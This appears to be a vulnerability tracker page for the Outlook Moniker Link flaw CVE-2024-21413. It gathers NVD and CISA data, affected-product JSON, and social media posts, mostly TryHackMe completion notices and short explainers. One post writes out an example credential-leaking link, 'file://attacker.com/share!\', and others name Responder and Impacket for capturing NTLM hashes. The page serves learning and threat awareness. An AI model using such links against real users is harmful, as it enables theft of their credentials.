CVE-2024-21413
Published Feb 13, 2024
Last updated 5 months ago
- Description
- Microsoft Outlook Remote Code Execution Vulnerability
- Source
- secure@microsoft.com
- NVD status
- Analyzed
- Products
- 365_apps, office_2016, office_2019, office_long_term_servicing_channel
CVSS 3.1
- Type
- Secondary
- Base score
- 9.8
- Impact score
- 5.9
- Exploitability score
- 3.9
- Vector string
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- Severity
- CRITICAL
Data from CISA
- Vulnerability name
- Microsoft Outlook Improper Input Validation Vulnerability
- Exploit added on
- Feb 6, 2025
- Exploit action due
- Feb 27, 2025
- Required action
- Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
- secure@microsoft.com
- CWE-20
- nvd@nist.gov
- NVD-CWE-noinfo
- Hype score
- Not currently trending
Day 45: 🔗CVE-2024-21413 (Moniker Link): Diving deep into how a simple Outlook hyperlink can bypass Protected View to leak NTLM hashes or trigger RCE. 🛠️
@dheeraditya1
18 Mar 2026
30 Impressions
0 Retweets
0 Likes
0 Bookmarks
1 Reply
0 Quotes
Outlook RCE CVE-2024-21413 (CVSS 9.8) is HOT! Malicious links exploit NTLM relay via preview pane for RCE. Think targeted phishing, but without a click. Exploit using Responder/Impacket. #Outlook #RCE #Cybersecurity https://t.co/BjeGzZHgIR
@computerauditor
17 Mar 2026
43 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/k0pdHWw7WT #tryhackme via @tryhackme
@Jasmin03897025
17 Mar 2026
54 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/87RysCQWhk #tryhackme via @tryhackme
@dronjx
16 Mar 2026
60 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/6mcGNF0J6B #tryhackme via @tryhackme
@lerchmirko
14 Mar 2026
71 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/bT1Aoqvy7R
@Ryad3135
11 Mar 2026
37 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/96Zk5MF9yT #tryhackme via @tryhackme
@XaliqRagimli27
10 Mar 2026
65 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/7rjTiv9kYO #tryhackme via @tryhackme
@chuol_hoth
28 Feb 2026
59 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/UUeK4V6W0z #tryhackme via @tryhackme
@mgillanders
28 Feb 2026
48 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/Eu6ilZW3mh #tryhackme via @tryhackme
@KuriJMandara
26 Feb 2026
41 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/Eu6ilZVvwJ #tryhackme via @tryhackme
@KuriJMandara
26 Feb 2026
39 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
🚨 [CRITICAL] APT29 OAuth Token Theft Campaign APT29 actively exploiting OAuth token theft t… 🔴 CVE: CVE-2024-21413 🕵️ APT: APT29 🏭 Sectors: finance, government #mysocAi #CyberSecurityusingAi #ThreatIntel #CVE202421413 🔗 https://t.co/1VmtnQVX6T
@MysocAi
23 Feb 2026
1 Impression
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
🚨 [CRITICAL] APT29 OAuth Token Theft Campaign APT29 actively… 🔴 CVE: CVE-2024-21413 🕵️ APT: APT29 🏭 Sectors: finance, government #mysocAi #CyberSecurityusingAi #Vulnerability #Criticality #ThreatIntel #CVE202421413 🔗 https://t.co/1VmtnQVX6T
@MysocAi
23 Feb 2026
2 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
🚨 [CRITICAL] APT29 Midnight Blizzard Active Campaign via OAuth Token Theft … 🔴 CVE: CVE-2024-21413, CVE-2024-20671 🕵️ APT: APT29 🏭 Sectors: finance, government #mysocAi #CyberSecurityusingAi #Vulnerability #Criticality #ThreatIntel #CyberSecurity #CVE202421413
@MysocAi
23 Feb 2026
1 Impression
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/k8il1CJ4og #tryhackme via @tryhackme
@Mr_ajitsharma74
22 Feb 2026
3 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/M3D111EzAJ #tryhackme @tryhackmeより
@Sirai_Tukuyomi
21 Feb 2026
44 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/ahRjmwCiSp #tryhackme via @tryhackme
@White_Crow017
20 Feb 2026
54 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
Just learned how CVE-2024-21413 (Moniker Link vuln) works and it’s wild 🤯 Outlook renders HTML emails → attacker embeds a file:// link → adds a special ! trick → bypasses Protected View → Windows auto-authenticates via SMB → leaks NTLM hash 😬 No malware. Just a
@White_Crow017
20 Feb 2026
106 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
Day 108 of learning Cybersecurity on TryHackMe, I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/J1ozAD0YTS #tryhackme via @tryhackme
@DGilcore
19 Feb 2026
58 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! An Outlook's vulnerability in 2024 that leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/J1ozAD0YTS #tryhackme via @tryhackme @ireteeh @Adanna_techie @AdePelumi15 https
@DGilcore
19 Feb 2026
85 Impressions
1 Retweet
2 Likes
1 Bookmark
1 Reply
0 Quotes
I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/jIq09hIs1e #tryhackme via @tryhackme
@lumentraaa
15 Feb 2026
40 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/5Sy9eiWyvk #tryhackme via @tryhackme
@YMoriati42377
13 Feb 2026
37 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/t6qJmMgLNS #tryhackme via @tryhackme
@quek_guan
8 Feb 2026
48 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/6xUmCMcDdm #tryhackme via @tryhackme
@Althaf1145
6 Feb 2026
45 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
The NTLM leak vulnerability (CVE-2024-21413): User receives email with link: file://attacker.com/share!\ User clicks. Windows: "Oh, a file share. Let me authenticate." Windows sends: Username + NTLM hash to attacker's server Attacker cracks hash offline One click. Full compromise
@SALIMASSILI2006
5 Feb 2026
47 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! https://t.co/igg97EGdwm
@saaramhussnain
5 Feb 2026
58 Impressions
0 Retweets
3 Likes
0 Bookmarks
0 Replies
0 Quotes
1️⃣ One character bypasses Microsoft security CVE-2024-21413: Add ! to a file:// link in Outlook. User clicks. Windows automatically leaks NTLM credentials. No download. No warning. CVSS 9.8 = critical. One character = Entire network compromised. https://t.co/p3ljypv97E
@SALIMASSILI2006
3 Feb 2026
57 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
One character can steal your password. Just ! in a file:// link = Windows leaks NTLM credentials. CVE-2024-21413 | CVSS 9.8 Small detail = Massive impact. This is why SOC analysts obsess over "minor" things. #CyberSecurity #SOCAnalyst #ThreatIntel https://t.co/YI8IKuDhuR
@SALIMASSILI2006
3 Feb 2026
66 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
Happy new month 🎉 February is here and the grind continues. Wrapped up the Moniker Link module (CVE-2024-21413). Learned how Outlook can leak NTLM hashes via Moniker Links and how to defend against it. #Cybersecurity #LearningInPublic #TechJourney https://t.co/aYMQMi4qlx
@jeo_crypts
2 Feb 2026
55 Impressions
1 Retweet
2 Likes
0 Bookmarks
1 Reply
0 Quotes
📢 𝐇𝐨𝐭 𝐨𝐟𝐟 𝐭𝐡𝐞 𝐩𝐫𝐞𝐬𝐬: 𝐂𝐕𝐄 𝐢𝐧𝐬𝐢𝐠𝐡𝐭𝐬! Discover how UAC-0028 exploits CVE-2024-21413 in Outlook to steal credentials and bypass defenses, with CERT-UA insights and actionable mitigations. 🌐 Explore the
@PurpleOps_io
2 Feb 2026
41 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/xXyriTmL53 #tryhackme via @tryhackme
@SultryIce
31 Jan 2026
71 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/yHnA3kLK5h #tryhackme via @tryhackme
@pooping4poops
30 Jan 2026
50 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/0P3MEzDC6V #tryhackme via @tryhackme
@J3CHxP
27 Jan 2026
43 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
I just completed Moniker Link (CVE-2024-21413) room on TryHackMe. Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/h0icCCtgXX #tryhackme via @tryhackme
@mallox_318
25 Jan 2026
0 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
I just completed Moniker Link (CVE-2024-21413) room on TryHackMe. Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/l5wmJlWHhw #tryhackme via @tryhackme
@MrKiyan404
22 Jan 2026
104 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
Day 16: my journey on @tryhackme alongside @d4rk_intel > Moniker link Deep dive into CVE-2024-21413, Explored how crafted Outlook links bypass Protected View, enabling credential leaks and potential RCE, alongside detection and mitigation in a lab environment. #cybersecurit
@Azutech_
22 Jan 2026
349 Impressions
0 Retweets
7 Likes
0 Bookmarks
1 Reply
0 Quotes
I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/40iFhXR2Lq #tryhackme via @tryhackme
@RedionMeta
20 Jan 2026
40 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
I just completed Moniker Link (CVE-2024-21413) room on TryHackMe. Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/n70Qrl6uev #tryhackme via @tryhackme
@JayeshV88153533
19 Jan 2026
58 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/9dCBQQsCyk #tryhackme via @tryhackme
@genius_157
19 Jan 2026
53 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
Day 14: Moniker Link (CVE-2024-21413) > @tryhackme Today, I took out time to learn about the Moniker Link vulnerability > explored how it's exploited, detected, and fixed. Great to be back in the groove! #OSINT #Cybersecurity https://t.co/LIJx09QEhU
@d4rk_intel
17 Jan 2026
738 Impressions
1 Retweet
13 Likes
3 Bookmarks
0 Replies
0 Quotes
I just completed Moniker Link (CVE-2024-21413) room on TryHackMe. Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/US7q3Y4PPk #tryhackme via @tryhackme
@L30_N30_THM
17 Jan 2026
50 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
MONIKER LINK _CVE-2024-21413(DEMO) CAPTURING NTLM HASH VIA HYPERLINK INJECTION TOOL:RESPONDER https://t.co/v1I1mtoLPK
@h4ruk7
14 Jan 2026
638 Impressions
0 Retweets
10 Likes
5 Bookmarks
0 Replies
0 Quotes
I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/kdGmfz1cBy #tryhackme via @tryhackme
@thisguycanhack
11 Jan 2026
1 Impression
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
Day 10: Completed Moniker Link (CVE-2024-21413) on TryHackMe. Explored how this Windows shortcut vulnerability can be abused to bypass security protections and enable malicious code execution. @purpullgirl #TryHackMe #HandsOn #CyberSecurity https://t.co/3Qvqe04rSd
@Aboda_lateria
11 Jan 2026
130 Impressions
1 Retweet
7 Likes
0 Bookmarks
0 Replies
0 Quotes
I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/6OoOdgvUKm #tryhackme via @tryhackme
@fwdFLASH
11 Jan 2026
48 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
I just completed Moniker Link (CVE-2024-21413) room on TryHackMe. Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/LFKT7KHxDz #tryhackme via @tryhackme #tryhackme #CVE #leakcredentials #learning
@LittleSun4lower
10 Jan 2026
69 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/QY0l0OLzhN #tryhackme via @tryhackme
@CyberKoroc
10 Jan 2026
75 Impressions
0 Retweets
1 Like
0 Bookmarks
0 Replies
0 Quotes
#Day 2 of my #ZeroToProHacker journey. Today I learned what Moniker Link (CVE-2024-21413) is and how it can be used to capture NetNTLMv2 hashes by sending a crafted link that forces the victim to authenticate to an attacker-controlled SMB share https://t.co/l2ppfCJb9b
@JaatYogesh57183
5 Jan 2026
13 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
CVE-2024-21413 breakdown: Outlook + file:// link + ! character = NTLM credential leak. No download. No malware. Just one click. Windows automatically tries to authenticate to the attacker's server. Credentials sent. This is why security isn't about "big vulnerabilities." https://
@SALIMASSILI2006
4 Jan 2026
85 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
I just completed Moniker Link (CVE-2024-21413) room on TryHackMe. https://t.co/eBUehYQIq0 #tryhackme via @tryhackme
@AhmedZerocool
2 Jan 2026
34 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
[
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "40C15EDD-98D4-4D06-BA06-21AE0F33C72D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:office_2016:-:*:*:*:-:*:x64:*",
"matchCriteriaId": "45A9ECE7-F173-47AB-A420-0B6F64A04D21",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:office_2016:-:*:*:*:-:*:x86:*",
"matchCriteriaId": "BF3B9F15-3077-4BC5-9EC5-7416A9FBDC70",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:office_2019:-:*:*:*:*:*:x64:*",
"matchCriteriaId": "241CDE2B-ABD0-4EFF-8D73-1766E32FA20F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:office_2019:-:*:*:*:*:*:x86:*",
"matchCriteriaId": "14D63E3F-A431-4DD8-979F-811E8DAC423D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:office_long_term_servicing_channel:2021:*:*:*:*:*:*:*",
"matchCriteriaId": "0B3EF1E5-4757-4CFA-AE72-6BA876D3C9FD",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
]